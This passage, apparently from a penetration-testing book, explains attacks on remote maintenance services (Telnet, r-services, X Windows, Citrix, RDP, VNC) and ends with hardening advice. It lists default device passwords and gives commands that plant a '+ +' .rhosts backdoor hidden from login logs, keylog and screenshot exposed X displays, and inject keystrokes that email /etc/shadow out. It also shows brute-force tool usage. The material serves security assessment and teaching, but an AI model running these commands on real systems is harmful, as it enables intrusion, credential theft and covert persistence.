

Username and password combinations to attempt


cisco, c, !cisco, enable, system, admin, router


admin, adm, tech, synnet, manager, monitor, debug, security

Bay Networks

security, manager, user


private, admin, user, year2000, d-link


system, access

In the field, I have found many smaller manufacturers of routers (in particular ADSL routers for small offices and home users) use passwords of 1234 and 12345 for the admin or root accounts. These credentials are worth trying for device manufacturers not listed in Table 8-12.

The Phenoelit site has a comprehensive list of hundreds of default device passwords for over 30 manufacturers, accessible at

Dictionary files and word lists

You can use dictionary files containing thousands of words when performing brute-force password grinding. Packet Storm has a number of useful lists at The O’Reilly site also has a small collection of excellent word lists that I use on a daily basis; they are zipped and available for download at

Telnet Vulnerabilities

A number of Telnet service vulnerabilities have been published in recent years. Often the vulnerability does not exist in the Telnet service daemon itself, but in the /bin/login binary or other local authentication mechanisms used. Therefore, a number of these issues can be exploited through other vectors (such as rlogind). Table 8-13 lists remotely exploitable Telnet service vulnerabilities and associated MITRE CVE references.

Table 8-13. Remotely exploitable Telnet service vulnerabilities

CVE reference





Solaris 10 and 11 -f client sequence authentication bypass attack



HP-UX trusted B.11.23 Telnet service authentication bug



System V-derived /bin/login static overflow vulnerability



BSD-derived telrcv( ) heap overflow vulnerability



IRIX 6.1 Telnet environment format string bug



Telnet service TERMCAP environmental variable buffer overflow



AIX, IRIX, and Linux -froot authentication bypass attack



Telnet LD_LIBRARY_PATH environment variable authentication bypass attack

Telnet exploit scripts

The public exploit scripts in Table 8-14 are available for a number of these vulnerabilities in the accompanying tools archive for this book, at

Table 8-14. Publicly available Telnet exploit scripts

CVE reference

Target platform

Exploit script(s)


Solaris 8 and prior

7350logout and holygrail.c


FreeBSD 4.x


MSF has exploit modules for CVE-2001-0797 (System-V derived /bin/login static overflow) and CVE-2007-0882 (Solaris 10 and 11 -f client sequence bug). For the full list of exploit modules that MSF supports in its stable branch, see

CORE IMPACT also supports CVE-2001-0797 and CVE-2007-0882 (the two Solaris Telnet exploits supported by MSF). Immunity CANVAS only supports CVE-2001-0797 at this time.


Unix r-services are common to commercial platforms, including Solaris, HP-UX, and AIX. I have assembled a list from the /etc/services file as follows:

exec            512/tcp
login           513/tcp
shell           514/tcp

Each service runs using standard PAM username and password authentication, which is overridden by ~/.rhosts and /etc/hosts.equiv entries defining trusted hosts and usernames. Locally, you will find that on Unix-based systems, the exec service is in.rexecd, the login service is in.rlogind, and the shell service is in.rshd.

Directly Accessing R-Services

From a Unix-based platform, you use rsh, rlogin, and rexec clients to access the respective r-services running on a remote host. Example 8-10 shows how you can use each client from the command shell.

Example 8-10. Standard r-services clients
$ rsh
usage: rsh [-nd] [-l login] host [command]
$ rlogin
usage: rlogin [ -8EL] [-e char] [ -l username ] host
$ rexec
rexec: Require at least a host name and command.
Usage: rexec [ -abcdhns ] -l username -p password  host command
     -l username: Sets the login name for the remote host.
     -p password: Sets the password for the remote host.
     -n: Explicitly prompt for name and password.
     -a: Do not set up an auxiliary channel for standard error.
     -b: Use BSD-rsh type signal handling.
     -c: Do not close remote standard in when local input closes
     -d: Turn on debugging information.
     -h: Print this usage message.
     -s: Do not echo signals to the remote process.

Unix ~/.rhosts and /etc/hosts.equiv files

The .rhosts file is in the user home directory under Unix and contains a list of username and IP address or machine hostname pairs, such as the following:

$ pwd
$ cat .rhosts

In this example, I can use any of the r-services (rsh, rlogin, or rexec) to connect to this host from if I am logged into the host as chris or from with any username on that host.

When a user connects to the host running rshd (the remote shell daemon running on TCP port 514), the source IP address is cross-referenced against the .rhosts file, and the username is verified by querying the identd service running at the source. If these details are valid, direct access is given to the host without even requiring a password.

A simple yet effective backdoor for most Unix-based systems running rshd is to place an .rhosts file in the home directory of the bin user (/usr/bin/ under Solaris) containing the wildcards + +. Example 8-11 demonstrates planting this file to provide access to the host.

Example 8-11. Setting up a simple rsh backdoor
$ echo + + > /usr/bin/.rhosts
$ exit
hacker@launchpad/$ rsh -l bin csh -i
Warning: no access to tty; thus no job control in this shell...
www% w
  5:45pm  up 33 day(s),  1 user,  load average: 0.00, 0.00, 0.01
User     tty           login@  idle   JCPU   PCPU  what
root     console      19Dec0219days                -sh

A useful characteristic of the rshd service is that terminals aren’t assigned to processes run through rsh. This means that bin access through the rshd backdoor doesn’t appear in the utmp or wtmp logs, so it is cloaked within the system (not appearing within w or who listings).


It is very easy to get from bin to root under Unix-based systems because the bin user owns many binaries (found under directories including /usr/sbin/) that run as services with root privileges.

The /etc/hosts.equiv file is a system-level file that defines trusted hostnames or IP addresses that can freely access r-services. SunOS 4.1.3_U1 shipped with a + wildcard in the /etc/hosts.equiv file, which allows attackers to instantly gain bin user access to SunOS 4.1.3_U1 servers with TCP port 514 open.

R-Services Brute-Force

User passwords can be brute-forced across rlogind because the service calls /bin/login. The rshd and rexecd services don’t pass username and password details to the login program in this way; they rely on .rhosts and /etc/hosts.equiv entries for authentication.

I recommend that for each user enumerated through Finger, SMTP, and other information-leak vulnerabilities, you should try to access the host directly through open r-services in the following fashion:

$ rsh -l chris csh -i
permission denied
$ rsh -l test csh -i
permission denied
$ rsh -l root csh -i
permission denied
$ rsh -l bin csh -i
Warning: no access to tty; thus no job control in this shell...

Spoofing RSH Connections

If you are aware of trust between hosts, you can spoof RSH connections to appear as if they are from trusted hosts using IP sequence prediction and falsified client responses to match entries in .rhosts files server-side. One tool that can perform RSH spoofing and execute commands is ADMrsh, available from the ADM site ( The utility requires the latest version of ADMspoof; its header files and its usage is shown here:


 It's very easy to use (like all the ADM products).

 ADMrsh [ips] [ipd] [ipl]  [luser] [ruser] [cmd]

 Parameters List :
 ips   =   ip source (ip of the trusted host)
 ipd   =   ip destination (ip of the victim)
 ipl   =   ip local (your ip to receive the informations)
 luser =   local user
 ruser =   remote user
 cmd   =   command to execute

 If ya don't understand, this is an example :

 ADMrsh root root "echo"+ +">/.rhosts"

 Credit's : Heike , ALL ADM CreW , !w00w00 , Darknet
 ADMrsh 0.5 pub (c) ADM  <-- hehe ;)

If the ADM web site is down or no longer archives the aforementioned files, you can download them from the O’Reilly security tools archive at the following locations (please note case-sensitivity):

Known R-Services Vulnerabilities

There are a large number of locally exploitable r-services issues relating to rshd and rexecd in particular; these are listed in MITRE CVE ( Table 8-15 lists remotely exploitable vulnerabilities in r-services.

Table 8-15. Remotely exploitable r-services vulnerabilities

CVE reference





System V-derived /bin/login static overflow vulnerability, exploitable through rlogind.



SCO Unix OpenServer 5.0.5 and UnixWare 7.0.1 and earlier allows remote attackers to gain privileges through rshd and rlogind.



rshd generates different error messages when a valid username is provided versus an invalid name; this allows remote attackers to determine valid users.



rexecd for various SVR4 systems allows remote attackers to execute arbitrary commands.



rshd allows users to log in with a NULL username and execute commands.

R-Services exploit scripts

Exploit scripts for these vulnerabilities are publicly available from archive sites such as Packet Storm ( At the time of this writing, the only issue supported by MSF, CORE IMPACT, and Immunity CANVAS is CVE-2001-0797.

X Windows

X Windows is commonly used by most major Unix-like operating systems as the underlying system for displaying graphical applications. For example, Gnome, CDE, KDE, and applications including xterm and ghostview run using the X Windows protocol.

X Windows was developed at MIT in 1984, with version 11 first released in 1987. The X Window system is currently at release 6 of version 11 (commonly referred to as X11R6). Over the past few years since release 2, the X Window system has been maintained by the X Consortium, an association of manufacturers supporting the X standard.

X Windows Authentication

X servers listen on TCP ports 6000 to 6063 (depending on the number of concurrent displays). Most of the time users simply access their local X server, although X can be accessed over a network for remote use. The two authentication mechanisms within X Windows are xhost and xauth, which I discuss in the following sections.


Host-based X authentication allows users to specify which IP addresses and hosts have access to the X server. The xhost command is used with + and options to allow and deny X access from individual hosts (i.e., xhost + If the + option is used with no address, any remote host can access the X server.

xhost authentication is dangerous and doesn’t provide the granularity required in complex environments. By issuing an xhost − command, host-based authentication is disabled, and only local access is granted.


When a legitimate user logs in locally to X Windows, a magic cookie is placed into the .Xauthority file under the user’s home directory. The .Xauthority file contains one cookie for each X display the user can use; this can be manipulated using the xauth utility as shown here:

$ xauth list MIT-MAGIC-COOKIE-1 d5d3634d2e6d64b1c078aee61ea846b5
onyx/unix:0 MIT-MAGIC-COOKIE-1 d5d3634d2e6d64b1c078aee61ea846b5

X server magic cookies can be placed into other user .Xauthority files (even on remote hosts) by simply copying the cookie and using xauth as follows:

$ xauth add MIT-MAGIC-COOKIE-1 d5d3634d2e6d64b1c078aee61ea846b5
$ xauth list MIT-MAGIC-COOKIE-1 d5d3634d2e6d64b1c078aee61ea846b5

Assessing X Servers

The most obvious vulnerability to check for when assessing X servers is whether xhost authentication has been enabled with the + wildcard. The xscan utility (available at can quickly identify poorly configured X servers.

Example 8-12 shows the xscan tool scanning the network.

Example 8-12. Running xscan
$ ./xscan 192.168.189
Scanning hostname ...
Connecting to (gatekeeper) on port 6000...
Host is not running X.
Scanning hostname ...
Connecting to (xserv) on port 6000...
Host is running X.
Starting keyboard logging of host to file KEYLOG192.168.

At this point, the tool taps into the X server display (:0.0) on and siphons keystrokes from the active programs on the remote system (to a file called KEYLOG192.168.189.66:0.0).

Upon identifying accessible X servers and displays, an attacker can do the following:

  • List the open windows for that X display

  • Take screenshots of specific open windows

  • Capture keystrokes from specific windows

  • Send keystrokes to specific windows

List open windows

To list the open windows for a given accessible X server display, issue the following xwininfo command:

$ xwininfo -tree -root -display | grep -i term
     0x2c00005 "root@onyx: /": ("GnomeTerminal" "GnomeTerminal.0")
     0x2c00014 "root@xserv: /": ("GnomeTerminal" "GnomeTerminal.0")

In this case, the output from xwininfo is piped through grep to identify open terminal sessions. In most cases, you are presented with a large number of open windows, so it’s useful to filter the output in this way.

Here, two open windows have hex window-ID values of 0x2c00005 and 0x2c00014. These ID values are needed when using tools to monitor and manipulate specific processes.

Take screenshots of specific open windows

X11R6 has a built-in tool called xwd that can take snapshots of particular windows. The utility uses XGetImage( ) as the main function call to do this. The output can be piped into the xwud command, which displays xwd images. Here are two examples of the tool being run to gather screenshots:

Show the entire display at

$ xwd -root -display | xwud

Show the terminal session window at 0x2c00005:

$ xwd -id 0x2c00005 -display | xwud

xwatchwin also takes updated screenshots every few seconds and is available at

If you specify a window ID using xwatchwin, it must be an integer instead of hex. The Window ID integer can be displayed if you add the -int option to xwininfo. Here are two command-line examples of the tool:

Show the entire display at

$ ./xwatchwin root

Show a specific window ID at

$ ./xwatchwin 46268351

Capture keystrokes from specific windows

You can use two tools to capture keystrokes from exposed X servers: snoop and xspy, which are available at:

Upon compiling, you can run both tools from the command line. Two examples follow, showing how these tools can be used to log keystrokes. Example 8-13 shows xsnoop being used to monitor the specific window ID 0x2c00005.

Example 8-13. Using xsnoop to monitor a specific window
$ ./xsnoop -h 0x2c00005 -d

The entire display can be monitored using xspy, as shown in Example 8-14.

Example 8-14. Using xspy to monitor the entire display
$ ./xspy -display

It was good to meet with your earlier on. I've enclosed the AIX
hardening guide as requested - don't hesitate to drop me a line if
you have any further queries!



[email protected]

Send keystrokes to specific windows

Pushing keystrokes to specific windows has varying mileage depending on the X server. xpusher and xtester are two tools you can use; they are available at:

The xpusher and xtester programs take two different approaches when trying to send keystrokes to the remote X server. The xpusher tool uses the XsendEvent( ) function, and xtester takes advantage of the XTest extensions included with X11R6. Recent X servers mark remote input through XsendEvent( ) as synthetic and don’t process it, so I recommend the xtester route if you are assessing an X11R6 server.

Both tools are extremely simple to use when you know to which windows you want to send keystrokes (using the xwininfo utility). Two command-line examples of the xpusher and xtester usage follow; both email the /etc/shadow file from the server.

Using xpusher to send commands to window 0x2c00005:

$ ./xpusher -h 0x2c00005 -display [email protected] <

Using xtester to send commands to window 0x2c00005:

$ ./xtester 0x2c00005 [email protected] < /etc/shadow

Known X Window System and Window Manager Vulnerabilities

The majority of vulnerabilities in XFree86 and other window management systems are locally exploitable (through abusing symlink vulnerabilities or race conditions), and I don’t cover them here. Remotely exploitable bugs in X Windows, CDE, and associated technologies are listed in Table 8-16.

Table 8-16. Remotely exploitable X Window system vulnerabilities

CVE reference(s)





Multiple libXpm 6.8.1 vulnerabilities



CDE dtlogin (on Solaris, HP-UX, and other platforms) crafted XDMCP packet overflow



XDM socket authentication bypass vulnerability



XFree86 4.3.0 font file handling vulnerability

CVE-2004-0093 and CVE-2004-0094


XFree86 4.1.0 GLX extension DoS and DRI overflows

CVE-2004-0083 and CVE-2004-0084


XFree86 4.3.0 ReadFontAlias( ) font alias file overflows



Multiple XFree86 4.3.0 font file handling vulnerabilities



CDE Desktop Subprocess Control Daemon (DTSPCD) allows remote attackers to execute arbitrary commands

CVE-2001-0803 is unique in that it requires access to TCP port 6112 (the DTSPCD service) and not the standard X Windows service (TCP port 6000). This service can also be queried to reveal the operating platform and some environment information.

X Windows exploit scripts

Exploit scripts for these vulnerabilities are publicly available from archive sites such as Packet Storm ( At this time, the only issue supported by exploitation frameworks (including MSF, CANVAS, and IMPACT) is CVE-2001-0803 (DTSPCD overflow).


Citrix is a scalable thin-client Windows service that is accessed directly through TCP port 1494 server-side. The protocol that Citrix uses is known as Independent Computing Architecture (ICA). After finding a server with TCP port 1494 open, you should use a Citrix ICA client to connect to the service for further investigation (available from

Using the Citrix ICA Client

When you run the client software, you should add a new ICA connection, using TCP/IP to communicate with the server and provide the IP address of the host with port 1494 open, as shown in Figure 8-7.

Setting up the ICA client to connect
Figure 8-7. Setting up the ICA client to connect

Username, password, and application details can all be left blank if you have no insight into the Citrix configuration. Upon entering the details correctly and connecting, a login screen like that shown in Figure 8-8 (depending on the server configuration) appears.

A Windows 2000 Server logon prompt through Citrix ICA
Figure 8-8. A Windows 2000 Server logon prompt through Citrix ICA

In some instances, you log into a Windows desktop environment with access to published applications such as Microsoft Word. In the case of having to authenticate first (as in Figure 8-8), the options are to provide a username and password combination that has already been compromised or to launch a brute-force attack.

Accessing Nonpublic Published Applications

If the Citrix server is configured to allow access only to specific published applications (i.e., doesn’t drop you down to a login screen), you can use a few techniques to enumerate and access these applications. This enumeration is performed over UDP port 1604, which is the Citrix ICA browser service port. Ian Vitek ( released two tools at DEF CON 10 to perform Citrix enumeration and attack.

Example 8-15 shows the citrix-pa-scan utility used to list nonpublic published applications.

Example 8-15. Using citrix-pa-scan to list published applications
$ ./citrix-pa-scan

Citrix Published Application Scanner version 1.0
By Ian Vitek, [email protected]  Printer Config
                 Admin Desktop

To connect to these published applications when the master browser isn’t publicly accessible, you can use the citrix-pa-proxy script to provide spoofed master browser details to the Citrix server as the connection is initiated:

$ perl

The proxy now listens on and forwards ICA traffic to Next, point your ICA client at the proxy (setting it as your master browser through the Server Location button), and specify the published application you wish to connect to, as shown in Figure 8-9.

Connecting to a specific published application
Figure 8-9. Connecting to a specific published application

Ian Vitek presented and demonstrated these tools at DEF CON 10. His presentation and supporting material is available from the Packet Storm archive at

Citrix Vulnerabilities

Remotely exploitable bugs in Citrix service technologies, including Citrix Presentation Server, Citrix Access Gateway, Citrix MetaFrame XP, and Citrix NFuse, are listed in Table 8-17.

Table 8-17. Remotely exploitable Citrix service vulnerabilities

CVE reference





Citrix Presentation Server 4.0 and MetaFrame XP 1.0 print provider library stack overflow



Citrix Presentation Server 4.0 and MetaFrame XP 2.0 IMA service heap overflow



Citrix Access Gateway Advanced Access Control (AAC) 4.2 LDAP authentication bypass vulnerability



Citrix MetaFrame Secure Access Manager 2.2 and Nfuse Elite 1.0 login form cross-site scripting issue



Citrix MetaFrame Presentation Server 4.0 launch.ica client device name policy restriction bypass vulnerabilities



Citrix MetaFrame XP Server 1.0 login form cross-site scripting issue



Citrix NFuse 1.6 launch.asp cross-site scripting issue



Citrix NFuse 1.5 boilerplate.asp directory traversal bug



Citrix NFuse 1.6 applist.asp information leak vulnerability



Citrix NFuse 1.6 launch.asp information leak and authentication bypass issues



Citrix NFuse 1.51 launch.asp web root path disclosure

Citrix exploit scripts

Exploit scripts for these vulnerabilities are publicly available from archive sites such as Packet Storm ( At the time of this writing, only Immunity CANVAS supports CVE-2007-0444 (Citrix print provider library stack overflow).


There are a number of client-side Citrix issues that can be exploited by remote web sites. Refer to CVE-2007-1196 and CVE-2006-6334 for further details. CVE-2005-3652 and CVE-2004-1078 are similar client-side issues. You can search MITRE CVE for Citrix issues to obtain details of current client-side, local server, and remote server issues.

Microsoft Remote Desktop Protocol

Remote Desktop Protocol (RDP, also known as Microsoft Terminal Services) provides thin client access to the Windows desktop. The Windows 2000, XP, and 2003 Server platforms usually run these services. The RDP service runs by default on TCP port 3389, and is accessed using the Remote Desktop client, as shown in Figure 8-10.

Connecting to RDP using the Remote Desktop client
Figure 8-10. Connecting to RDP using the Remote Desktop client

The Microsoft RDP client is available at

RDP Brute-Force Password Grinding

After locating accessible RDP servers (by port scanning for TCP 3389) and performing enumeration through anonymous NetBIOS sessions (see Chapter 9) to identify potentially weak user accounts, an attacker can launch brute-force password-grinding attacks. The Administrator account is usually a good place to start because it can’t be locked locally upon multiple failed login attempts.

Tim Mullen put together a useful tool called TSGrinder for brute-forcing terminal services, available at Example 8-16 shows the TSGrinder usage from a Windows command prompt.

Example 8-16. Using TSGrinder
D:	sgrinder> tsgrinder
tsgrinder version 2.03

  tsgrinder [options] server

  -w dictionary file (default 'dict')
  -l 'leet' translation file
  -d domain name
  -u username (default 'administrator'
  -b banner flag
  -n number of simultaneous threads
  -D debug level (default 9, lower number is more output)

  tsgrinder -w words -l leet -d workgroup -u administrator -b
            -n 2

The TSGrinder tool takes advantage of two features within the terminal services security model; the first is that failed authentication attempts are only logged if a user provides six incorrect username and password combinations within a given session, and the second feature is that the tool uses RDP encrypted channel options when attempting to log in so that an IDS won’t pick up on the attack.

RDP Vulnerabilities

A number of DoS and memory leak issues have been found in Microsoft Terminal Services over the last three years. Three issues that allow attackers to perform man-in-the-middle (MITM) attacks against RDP sessions are listed in MITRE CVE as CVE-2007-2593, CVE-2005-1794, and CVE-2002-0863. Table 8-18 lists a serious remotely exploitable issue within RDP.

Table 8-18. Remotely exploitable Microsoft Terminal Services bug

CVE reference





RegAPI.DLL overflow in Windows NT 4.0 Terminal Server allows remote attackers to execute arbitrary commands via a long username.

No public exploits for this issue are known at this time. Exploitation frameworks (including MSF, CANVAS, and IMPACT) do not support RDP or Terminal Services vulnerabilities at the time of this writing.

RDP sessions can be sniffed and hijacked using a MITM attack, compromising authentication credentials. Cain & Abel ( supports this attack.


Virtual Network Computing (VNC) was a protocol originally developed by AT&T. Since then, a number of VNC packages have been produced that are both free and commercially supported, providing remote desktop access to Windows and Linux platforms in particular. VNC uses the following TCP ports:

  • Port 5800 for HTTP access using a Java client through a web browser

  • Port 5900 for direct access using the native VNC viewer

From a security perspective, VNC is relatively straightforward to compromise. A major issue with VNC security is its authentication mechanism, shown in Figure 8-11.

VNC authentication relies on a single password
Figure 8-11. VNC authentication relies on a single password

Most VNC services require only one piece of data for authentication purposes: a session password with a maximum length of eight characters. On the target server, the VNC password string is stored in the Windows registry under the following keys:


A fixed key encrypts the VNC password using DES, so if an attacker gains read access to the system registry across the network (often accessible on poorly protected Windows hosts), she can compromise the VNC session password. The fixed key is found in the VNC source code (0x238210763578887 at the time of writing).

VNC Brute-Force Password Grinding

VNCrack by FX of Phenoelit is a Unix-based VNC cracking utility that’s available from You can use VNCrack to perform decryption of the VNC session password retrieved from the system registry, as well as active brute force against the VNC service over a network.

The VNC handshake can be sniffed and the session password compromised using the Unix-based PHoss network sniffing utility, available from Phenoelit at

Example 8-17 shows the usage of the Unix-based VNCrack utility.

Example 8-17. Using VNCrack
$ ./vncrack
by Phenoelit (

Online: ./vncrack -h -w wordlist.txt [-opt's]
Passwd: ./vncrack -C /home/some/user/.vnc/passwd
Windows interactive mode: ./vncrack -W
        enter hex key one byte per line - find it in
        HKEY_CURRENT_USERSoftwareORLWinVNC3Password or

Options for online mode:
-v      verbose
-d N    Sleep N nanoseconds between each try
-D N    Sleep N seconds between each try
-a      Just a funny thing
-p P    connect to port P instead of 5900
-s N    Sleep N seconds in case connect(  ) failed
Options for PHoss intercepted challenges:
-c <challenge>  challenge from PHoss output
-r <response>   response from PHoss output

By specifying the challenge and response traffic siphoned by PHoss, the tool can instantly compromise sniffed session passwords also. Example 8-18 shows that the VNC session password for is control after launching a brute-force attack.

Example 8-18. Brute-forcing the VNC password with VNCrack
$ ./vncrack -h -w common.txt
VNCrack - by Phenoelit (
Server told me: connection close
Server told me: connection close

Password: control

The VNCrack tool has been ported and compiled for Windows environments, titled VNCrackX4. Example 8-19 shows the x4 command-line options.

Example 8-19. VNCrackX4 tool usage
D:phenoelit> x4
by Phenoelit (

Online: ./vncrack -h -w wordlist.txt [-opt's]
Windows interactive mode: ./vncrack -W
        enter hex key one byte per line - find it in
        HKEY_CURRENT_USERSoftwareORLWinVNC3Password or

Options for online mode:
-v      verbose (repeat -v for more)
-p P    connect to port P instead of 5900
Options for PHoss intercepted challages:
-c <challange>  challange from PHoss output
-r <response>   response from PHoss output

If the Phenoelit site is down or no longer archives these tools, you can also access them at the following locations:

VNC Vulnerabilities

At the time of this writing, MITRE CVE lists the following serious remotely exploitable issues within VNC services, as detailed in Table 8-19. Two issues that allow attackers to perform MITM attacks against VNC sessions are listed in MITRE CVE as CVE-2002-1336 and CVE-2001-1422.

Table 8-19. Remotely exploitable VNC bugs

CVE reference





LibVNCServer 0.7.1 authentication bypass vulnerability



RealVNC 4.1.1 (and other products that use RealVNC, including AdderLink IP and Cisco CallManager) authentication bypass vulnerability



Multiple UltraVNC 1.0.1 buffer overflows



MOSIX clump/os 5.4 blank password VNC account access



AT&T WinVNC server 3.3.3r7 HTTP GET request buffer overflow

VNC exploit scripts

CORE IMPACT supports CVE-2006-2369 (RealVNC 4.1.1 authentication bypass). None of the issues listed in Table 8-19 are supported by Immunity CANVAS or MSF at this time. Public exploit scripts for these vulnerabilities are available from archive sites such as Packet Storm (

Remote Maintenance Services Countermeasures

The following countermeasures should be considered when hardening remote maintenance services:

  • Don’t provide anonymous FTP access unless specifically required. If you are running anonymous FTP, ensure the service patches are up-to-date and that your firewall software is also current.

  • Ensure aggressive firewalling both into and out of your public servers. Most publicly available exploits use connect-back or bindshell shellcode, which allow attackers to compromise your server if it isn’t fully protected at the network level. If possible, avoid running other public network services (for example, web or mail services) on the same machine as an FTP server.

  • Don’t run Telnet services on publicly accessible devices. Cisco IOS and decent appliance servers and operating platforms support SSH.

  • Ensure resilience of your remote maintenance services from brute-force password-guessing attacks. Ideally, this involves setting account lockout thresholds and enforcing a good password policy.

  • Don’t run r-services (rsh, rexec, or rlogin) because they are vulnerable to spoofing attacks, use very weak authentication, and are plain text.

  • In secure environments, don’t use services such as VNC because they have weak authentication, and determined attackers can compromise them. You should use Microsoft RDP and Citrix ICA services over an SSL or IPsec VPN to prevent sniffing and hijacking attacks.

  • Read Microsoft’s guide to hardening terminal services (

  • To improve authentication and completely negate brute-force attacks, use two-factor authentication mechanisms such as Secure Computing Safeword and RSA SecurID. These solutions aren’t cheap, but they can be useful when authenticating administrative users accessing critical servers.

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